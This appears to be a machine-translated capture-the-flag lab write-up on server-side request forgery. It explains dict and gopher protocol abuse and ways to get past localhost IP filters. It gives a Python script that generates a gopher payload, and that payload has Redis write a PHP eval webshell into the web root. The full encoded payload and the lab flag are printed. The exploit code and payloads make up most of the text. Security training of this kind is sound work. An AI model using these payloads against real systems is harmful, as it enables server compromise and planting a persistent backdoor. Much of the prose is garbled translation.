No.0 training platform course-2. SSRF Foundation

Loophole principle ：

Protocol utilization
• File agreement
• Local file transfer protocol
• Arbitrary file reading
• Dict agreement
• Dictionary server protocol
• operation Redis
• Gopher agreement
• Distributed file collection and acquisition network protocol .
• Support multiple lines
• operation Redis、Memcached、fastcgi、mysql etc.

Input ：
Dict://127.0.0.1:6379/info

Local IP The address is filtered ：
There are many ways to bypass ,1、 hold IP Address converted to 10 Base number 、16 Base number

Input ：
dict://2130706433:6379/info

dict://0x7F000001:6379/info

Python Code generation gopher Protocol message writing webshell

#/usr/bin/python

import urllib

protocol="gopher://"
# redis Of the host server IP,10 Base number IP：127.0.0.1
ip="2130706433"
port="6379"
# php Code ,POST Mode submission 、GET Mode submission 
shell="\n\n<?php eval($_POST[\"cmd\"]);?>\n\n"
filename="shell.php"
# web Service directory 
path="/var/www/html"
passwd=""
cmd=["flushall",
   "set 1 {}".format(shell.replace(" ","${IFS}")),
   "config set dir {}".format(path),
   "config set dbfilename {}".format(filename),
   "save"
   ]

if passwd:
   cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"

def redis_format(arr):
   CRLF="\r\n"
   redis_arr = arr.split(" ")
   cmd=""
   cmd+="*"+str(len(redis_arr))
   for x in redis_arr:
      cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
   cmd+=CRLF
   return cmd

if __name__=="__main__":
   for x in cmd:
      payload += urllib.parse.quote(redis_format(x))
   print(payload)

adopt gopher Agreement to local 127.0.0.1 Of web Catalog /var/www/html Next write a sentence, Trojan horse webshell：
gopher://2130706433:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%22cmd%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

Connection target webshell

Found written shell.php and flag

Flag：ea56f7b7ac613b8ca0e6ebb54b66eb91